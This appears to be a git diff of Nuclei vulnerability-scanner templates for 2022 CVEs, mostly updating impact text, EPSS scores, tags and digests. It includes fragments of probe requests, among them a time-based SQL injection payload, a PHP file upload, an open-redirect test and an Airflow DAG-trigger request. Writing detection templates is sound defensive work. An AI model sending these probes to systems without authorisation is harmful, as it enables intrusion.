cvss-score: 9.8 cve-id: CVE-2022-3980 cwe-id: CWE-611 - epss-score: 0.64829 - epss-percentile: 0.97566 + epss-score: 0.49036 + epss-percentile: 0.97431 cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: verified: true @@ -49,4 +52,4 @@ http: - "status_code == 400" - "len(body) == 0" condition: and -# digest: 4a0a00473045022055acf7afea47b8c8489e455f5796d4d5066eb9aa73cb9bbeaa66a4b8008c853602210083c5f822cebf2b24d22e9534e2d371eea5775454abeaea1b1248a5eaabff0dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c485611836eec10a1ed541a3725bc35ddc5c20287b97f2ac232d2da614d03c202202fe8d887267e1145fd5315a3ce8588e05e684c7f439e5a7ca6ed2bf669c27137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3982.yaml b/nuclei-templates/CVE-2022/CVE-2022-3982.yaml index cb0c93dccb..a6d0caaa93 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3982.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3982.yaml @@ -6,18 +6,21 @@ info: severity: critical description: | WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can lead to remote code execution, allowing attackers to take control of the affected WordPress website. remediation: Fixed in 3.2.2. reference: - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867 - https://wordpress.org/plugins/booking-calendar/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3982 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 - epss-score: 0.18164 - epss-percentile: 0.95662 + epss-score: 0.20211 + epss-percentile: 0.96236 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +28,10 @@ info: vendor: wpdevart product: booking_calendar framework: wordpress - tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive + tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart + +variables: + string: "CVE-2022-3982" http: - raw: @@ -61,7 +67,7 @@ http: Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Type: application/octet-stream - + --------------------------1cada150a8151a54-- - | @@ -69,12 +75,10 @@ http: Host: {{Hostname}} matchers: - - type: dsl - dsl: - - contains(header_3, "text/html") - - status_code_3 == 200 - - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d') - condition: and + - type: word + part: body_3 + words: + - '{{md5(string)}}' extractors: - type: regex @@ -83,4 +87,4 @@ http: regex: - var wpdevart.*"ajaxNonce":"(.*?)" internal: true -# digest: 4b0a00483046022100e158f5fa71617358a4ad927a9bc01d160c83615e64691f854c3cb4a43f6dec71022100e79592c9c921d5e55b20a2d415ce31b287d036b47955ff7e1971972b0e25e726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202048dbf451944c332d32cdf8e3e5afbd0760aad3b5c7ca8c8c9f5b8dc67c72c4022100cc0a5e2454e13a1a291ddb35096375206887fdc27eabed9aa389628c9cf910d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-39952.yaml b/nuclei-templates/CVE-2022/CVE-2022-39952.yaml index 655b8b64e0..bbf0783c46 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-39952.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-39952.yaml @@ -6,19 +6,22 @@ info: severity: critical description: | Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data loss. remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above. reference: - https://fortiguard.com/psirt/FG-IR-22-300 - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/ - https://github.com/horizon3ai/CVE-2022-39952 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 + - https://github.com/1f3lse/taiE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-668,CWE-73 - epss-score: 0.86893 - epss-percentile: 0.9831 + epss-score: 0.96445 + epss-percentile: 0.99548 cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: fortinet product: fortinac shodan-query: title:"FortiNAC" - tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive + tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive variables: boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" @@ -62,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022067281ed86df00376a77d93e4ea41aa9c523ff8074d2addfa0857ad128008d247022075325f32efe56fa081e8d94f533c6ade346337b0b08fe5990f357f7f6263bba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203cea582616645262451f278883a52ba23466fd71d17efc23fbe8aa5ee2a16c6a0220761185b2c6e66b8eb362c33c1f84a4517c8a9c07670e4e28002fe0ee4767c1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-39960.yaml b/nuclei-templates/CVE-2022/CVE-2022-39960.yaml index d6031f6ff7..74311099bb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-39960.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-39960.yaml @@ -1,26 +1,39 @@ id: CVE-2022-39960 info: - name: Atlassian Jira addon Netic Group Export < 1.0.3 - Unauthenticated Access + name: Jira Netic Group Export <1.0.3 - Missing Authorization author: For3stCo1d severity: medium description: | - The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI. + Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive data. + remediation: | + Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue. reference: - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history - https://nvd.nist.gov/vuln/detail/CVE-2022-39960 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-39960 cwe-id: CWE-862 + epss-score: 0.21326 + epss-percentile: 0.96012 + cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* metadata: + verified: true + max-request: 1 + vendor: netic + product: group_export + framework: jira shodan-query: http.component:"Atlassian Jira" - verified: "true" tags: cve,cve2022,atlassian,jira,netic,unauth -requests: +http: - raw: - | POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1 @@ -48,3 +61,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100e48f19893d9a16ba855d6f9730af410be8edc4eab9b16ef74fe2b8efe0053ec70220188c3998530c97f55e5c698dfd34fd5a9db1a22759017498b1d094525c774be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-39986.yaml b/nuclei-templates/CVE-2022/CVE-2022-39986.yaml index 3e65fcea27..977beb7f8d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-39986.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-39986.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-39986 cwe-id: CWE-77 - epss-score: 0.84732 - epss-percentile: 0.98184 + epss-score: 0.87977 + epss-percentile: 0.98588 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: raspap product: raspap shodan-query: http.favicon.hash:-1465760059 - tags: packetstorm,cve,cve2020,raspap,rce + tags: cve,cve2022,packetstorm,raspap,rce http: - raw: @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100faf75aa32d9fef61de889c0437c70bb61ad79c735fa1b4b49e87587ecf05d284022100fc9c8d03291609c2bc2ccd01ec690dd1e11330d8dd1d43983ad03e2681ed2b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4276486bf740d5acd36f59842a4bb0b0c269c2f35c5b44b7636f342e3f67cea02204698566d89e3bfcb3a4f81b02a07c2ec2552a2b2c88e067bb333d25f7a346cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40022.yaml b/nuclei-templates/CVE-2022/CVE-2022-40022.yaml index 6e1860ee1b..4d2e1d1f67 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40022.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40022.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device. remediation: | Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40022 cwe-id: CWE-77 - epss-score: 0.84943 - epss-percentile: 0.98198 + epss-score: 0.82869 + epss-percentile: 0.98341 cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" @@ -28,7 +30,7 @@ info: vendor: microchip product: syncserver_s650_firmware shodan-query: html:"Symmetricom SyncServer" - tags: packetstorm,cve,cve2022,syncserver,rce,unauth + tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip http: - raw: @@ -56,4 +58,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100d01b5b255020469eeb12918b99f667fb5d28b158016bd37a43e1ae65a48f276b0221009860d8ef653a00fd5c0f381ce8023e2d8c6327ba2d3bac66520ce06b2e7df8a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa89454b284e35f82c58b79db719d9270edf456761c8aa7bded1254e7a8fd8fb022100a95aa00978443217fc6d8c9d178a21856ac5ac6e5aa0dcd44bcfb2ce9448c58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40032.yaml b/nuclei-templates/CVE-2022/CVE-2022-40032.yaml index f9277a7297..85d799f96c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40032.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40032.yaml @@ -17,15 +17,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40032 cwe-id: CWE-89 - epss-score: 0.00205 - epss-percentile: 0.58363 + epss-score: 0.00174 + epss-percentile: 0.54566 cpe: cpe:2.3:a:simple_task_managing_system_project:simple_task_managing_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: simple_task_managing_system_project product: simple_task_managing_system - tags: packetstorm,cve,cve2022,simple-task,stms,sqli + tags: cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project http: - raw: @@ -45,4 +45,4 @@ http: - "contains(location, 'login.php')" - 'contains(content_type, "text/html")' condition: and -# digest: 4b0a00483046022100f52b26f50d7050f0538f29ea456d9c718405e4e3770bbac34eb080dce02619e8022100b566433951ec9e96f45fe11ce5319ff33f699f4aee2ee8826caa59b1118e747f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205adf6288fe87134b556d34fbfea1ed592c7a42950b76ddfbb3c75d90cba774e7022100b0c41e62a09fa680a12f1210778fe7bf97dab393091e9727779d941a9f3a2056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40047.yaml b/nuclei-templates/CVE-2022/CVE-2022-40047.yaml index bf5bd8b721..d4dae819da 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40047.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40047.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-40047 cwe-id: CWE-79 epss-score: 0.00535 - epss-percentile: 0.74548 + epss-percentile: 0.76696 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -60,4 +60,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=\"alert(document.domain)")' condition: and -# digest: 4a0a004730450220057b8339ddb6abf7f302c0ce2930970721d2d74cb1e5c01ae73ecf452fda2bbd022100d74919fcc4b6c6068fca4cfffb9cea7431d1d7f97f3562e58bec9ab05be96d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe7ff33760e6216455b976917c3895164eff5585432a53158db6e362b5c59bc702203d624f6051dbcc168fdd190e57fed04454c628d0500d5dffb611d8b5ec17e4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40083.yaml b/nuclei-templates/CVE-2022/CVE-2022-40083.yaml index 99d53eff29..160bffd6a4 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40083.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40083.yaml @@ -6,31 +6,42 @@ info: severity: critical description: | Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,. remediation: Download and install 4.9.0, which contains a patch for this issue. reference: - https://github.com/labstack/echo/issues/2259 - https://nvd.nist.gov/vuln/detail/CVE-2022-40083 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2022-40083 cwe-id: CWE-601 + epss-score: 0.0212 + epss-percentile: 0.88046 + cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: labstack + product: echo tags: cve,cve2022,redirect,labstack -requests: +http: - method: GET path: - "{{BaseURL}}//interactsh.com%2f.." matchers-condition: and matchers: - - type: word + - type: regex part: location - words: - - '//interactsh.com/../' + regex: + - '^\s*//interactsh.com/\.\.' - type: status status: - 301 - -# Enhanced by md on 2022/10/18 +# digest: 4b0a00483046022100fded3edccd5f1179bdb2580cb9d18c97d3dab9ced013e1e822c48bd48ccfb195022100b207d6a21963237237bf2129669404f2fb7e5100b1ae87859f861bbac456db4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40127.yaml b/nuclei-templates/CVE-2022/CVE-2022-40127.yaml index f08ebebe5e..2ab8306634 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40127.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40127.yaml @@ -1,43 +1,53 @@ id: CVE-2022-40127 info: - name: AirFlow < 2.4.0 - RCE + name: AirFlow < 2.4.0 - Remote Code Execution author: DhiyaneshDk,ritikchaddha severity: high description: | A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Upgrade AirFlow to version 2.4.0 or later to mitigate this vulnerability. reference: - https://github.com/Mr-xn/CVE-2022-40127 - https://nvd.nist.gov/vuln/detail/CVE-2022-40127 + - http://www.openwall.com/lists/oss-security/2022/11/14/2 + - https://github.com/apache/airflow/pull/25960 + - https://lists.apache.org/thread/cf132hgm6jvzvsbpsozl3plf1r4cwysy classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2022-40127 + cwe-id: CWE-94 + epss-score: 0.28782 + epss-percentile: 0.96752 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 3 + vendor: apache + product: airflow shodan-query: title:"Sign In - Airflow" - tags: cve,cve2022,airflow,rce,oast + tags: cve,cve2022,airflow,rce,oast,authenticated,apache -requests: +http: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - - | POST /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - - | @timeout: 15s POST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1 Host: {{Hostname}} - Accept: application/json Content-Type: application/json - Origin: {{BaseURL}} { "conf": { @@ -48,7 +58,6 @@ requests: } - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -56,6 +65,11 @@ requests: words: - 'state": "queued"' + - type: word + part: interactsh_protocol + words: + - dns + - type: status status: - 200 @@ -64,6 +78,7 @@ requests: - type: regex name: csrf_token group: 1 - internal: true regex: - 'type="hidden" value="(.*?)">' + internal: true +# digest: 4a0a004730450220268a6975a87f86a812533542ac7994169de5175872889d429254a91734af5044022100b472c5440cfea767aec326fbd15a942a4d35efcd9f11e527f167068308b38d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40359.yaml b/nuclei-templates/CVE-2022/CVE-2022-40359.yaml index 57167dc921..e5c85bfa5c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40359.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40359.yaml @@ -6,20 +6,32 @@ info: severity: medium description: | Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://cxsecurity.com/issue/WLB-2022090057 - https://code.google.com/archive/p/kfm/downloads - https://nvd.nist.gov/vuln/detail/CVE-2022-40359 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-40359 cwe-id: CWE-79 + epss-score: 0.00129 + epss-percentile: 0.46796 + cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,xss,kfm + verified: true + max-request: 1 + vendor: kfm_project + product: kfm + tags: cve,cve2022,xss,kfm,kfm_project -requests: +http: - raw: - | GET /kfm/index.php/' HTTP/1.1 @@ -43,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a004730450220171d85e0f730e64868dee2a05909f6c686e599f48f3696442a181b69884cf50f022100c1f6c50e667cb2eb97f58eadec05e4db8a84fdda96907fa4c22f023609840b63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4049.yaml b/nuclei-templates/CVE-2022/CVE-2022-4049.yaml index f477f4b2c8..224eae8487 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4049.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4049.yaml @@ -10,13 +10,14 @@ info: - https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be - https://wordpress.org/plugins/wp-user/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4049 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4049 cwe-id: CWE-89 - epss-score: 0.03843 - epss-percentile: 0.90945 + epss-score: 0.04217 + epss-percentile: 0.92045 cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +26,7 @@ info: product: wp_user framework: wordpress publicwww-query: /wp-content/plugins/wp-user/ - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project http: - raw: @@ -64,4 +65,4 @@ http: regex: - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a00473045022029d0c6fb080e7dc721729dbcbfca3106ca4808d6656dc19023565f6c8ba2190a022100808727523f33bb4df1cebb498db57e2de91e35129111b551e50aec5cccd559ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200bc446290576844df258d034022250c3aa6e8246bb5a19d65fa51e01ba5b35e4022100fc78eae46cc6546539a10fd2ec8828a404ac6f42e58cd5aed957844879de1ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4050.yaml b/nuclei-templates/CVE-2022/CVE-2022-4050.yaml index 66910ece9b..38f1381f3f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4050.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4050.yaml @@ -6,20 +6,33 @@ info: severity: critical description: | WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Update to JoomSport plugin version 5.2.8 or later. reference: - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f - https://wordpress.org/plugins/joomsport-sports-league-results-management/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4050 cwe-id: CWE-89 + epss-score: 0.04713 + epss-percentile: 0.9246 + cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wpscan,cve,cve2022,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth + verified: true + max-request: 1 + vendor: beardev + product: joomsport + framework: wordpress + tags: cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev -requests: +http: - raw: - | @timeout: 15s @@ -27,15 +40,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-"} + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-"} matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4b0a00483046022100adc5764e0fcc369d16e68be00829b99d4fd95b2241bff1c6ef38c1a561fd9c1c0221008f5d90efe26e0150b8ed5e151209c27ebe6766cc9e70d08983c5696822fa55ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4057.yaml b/nuclei-templates/CVE-2022/CVE-2022-4057.yaml index 8c48e06f99..9cc0272f1e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4057.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4057.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs. + impact: | + An attacker can gain access to sensitive information, potentially leading to further attacks. remediation: | Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-4057 cwe-id: CWE-425 - epss-score: 0.00177 - epss-percentile: 0.54814 + epss-score: 0.00125 + epss-percentile: 0.46949 cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: product: autooptimize framework: wordpress publicwww-query: /wp-content/plugins/autoptimize - tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,disclosure,autoptimize + tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters http: - method: GET @@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f3f2a1e5217594672b14878cf8197821a12abb32ee31e82285b0fc9c39ccb30802201b09b968d28e8b6678a2f2c7705b3c6867e7cb39e108070053d6f1169a5c995e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0bf6688a368fac230bd01722ccc5ff4a0094c997d4bc9e929424d1b2811d3d6022100dbac1fd1415a66ee1b95e9b5ae6303e3cb1fed954b0b80af47c8665c3c6db65a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4059.yaml b/nuclei-templates/CVE-2022/CVE-2022-4059.yaml index 2981f83c31..4047f7f53e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4059.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4059.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4059 cwe-id: CWE-89 - epss-score: 0.01682 - epss-percentile: 0.86284 + epss-score: 0.01515 + epss-percentile: 0.85653 cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: cryptocurrency_widgets_pack framework: wordpress publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ - tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli + tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera http: - raw: @@ -45,4 +45,4 @@ http: - 'status_code_1 == 302' - 'contains(body_2, "Cryptocurrency Widgets Pack")' condition: and -# digest: 4b0a00483046022100af45cb5a2574fd08cf833ede073b84bea80c04170b796455af72df512ecc337b0221008dce0953d43efc63eb9a1e459fc6a64ce8ecc747efd7b57e049a795570035d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec787a041969c87a9d0dfe9246ba9dbae1cdddae1fab53af91e2d39f501e35f1022005e07d6858416eed4f65ee7c5b6d8edf6a2538f6550466bd97a1ed559d5fad70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4060.yaml b/nuclei-templates/CVE-2022/CVE-2022-4060.yaml index c06ca2014a..1e005b5d4a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4060.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4060.yaml @@ -6,19 +6,23 @@ info: severity: critical description: | WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e - 